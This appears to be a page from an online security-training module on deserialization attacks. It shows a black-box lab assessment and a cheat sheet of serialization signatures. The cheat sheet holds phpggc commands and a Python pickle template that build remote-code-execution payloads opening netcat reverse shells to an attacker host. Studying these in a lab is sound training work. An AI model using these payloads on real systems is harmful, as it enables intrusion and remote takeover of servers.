Introduction to Deserialization Attacks

Skills Assessment II

The company HTBear GmbH wants you to test their website for vulnerabilities. Certainly, the "internet's oldest security blog" wouldn't have any security vulnerabilities? That would just be ironic...

Note that, unlike the previous assessment, this is a black-box test (no source code is given). Use what you've learned in this module and work with what you are given!

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

+ 20 [http://SERVER_IP:8080] Obtain admin access and submit the flag you get

+10 Streak pts

+ 15 [http://SERVER_IP:8080] Achieve remote command execution and read the flag.txt file

+10 Streak pts

Go to Questions

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Identifying the use of Serialization

White-Box

Function	Language
`unserialize()`	PHP
`pickle.loads()`	Python (Pickle)
`jsonpickle.loads()`	Python (JSONPickle)
`yaml.load()`	Python (PyYAML, ruamel.yaml)
`readObject()`	Java
`Deserialize()`	C#/.NET
`Marshal.load()`	Ruby

Black Box

Bytes	Language
`a:4:{i:0;s:4:"Test";i:1;s:4:"Data";i:2;a:1:{i:0;i:4;}i:3;s:7:"ACADEMY";}`	PHP
`(lp0\nS'Test'\np1\naS'Data'\np2\na(lp3\nI4\naaS'ACADEMY'\np4\na.`	Python 2.x (Pickle Protocol 0)
`80 01` (Hex)	Python 2.x (Pickle Protocol 1)
`80 02` (Hex)	Python 2.3+ (Pickle Protocol 2)
`80 03` (Hex)	Python 3.8+ (Pickle Protocol 4)
`80 04 95` (Hex)	Python 3.x (Pickle Protocol 5)
`["Test", "Data", [4], "ACADEMY"]`	Python 2.7 / 3.6+ (JSONPickle
`- Test\n- Data\n- - 4\n- ACADEMY\n`	Python 3.6+ (PyYAML / ruamel.yaml)
`AC ED 00 05 73 72` (Hex), `rO0ABXNy` (Base64)	Java
`00 01 00 00 00 ff ff ff ff` (Hex), `AAEAAAD/////` (Base64)	C#/.NET
`04 08` (Hex)	Ruby

Exploiting PHP Deserialization

PHPGGC

# List out available gadget chains for a specific framework:
phpggc -l Laravel

# Generate an RCE payload using a specific gadget chain:
phpggc Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -b

# Generate a payload to exploit a PHAR deserialization vulnerability:
phpggc -p phar Laravel/RCE9 system 'nc -nv <ATTACKER_IP> 9999 -e /bin/bash' -o exploit.phar

Exploiting Python Deserialization

# Template for Pickle RCE exploit:

import pickle
import base64
import os

class RCE:
	def __reduce__(self):
		return os.system, ("nc -nv 1.2.3.4 5555 -e /bin/bash",)

print(base64.b64encode(pickle.dumps(RCE())).decode())

Introduction to Deserialization Attacks

Skills Assessment II

Questions

Table of Contents

Introduction

Exploiting PHP Deserialization

Exploiting Python Deserialization

Defending against Deserialization Attacks

Skills Assessment

My Workstation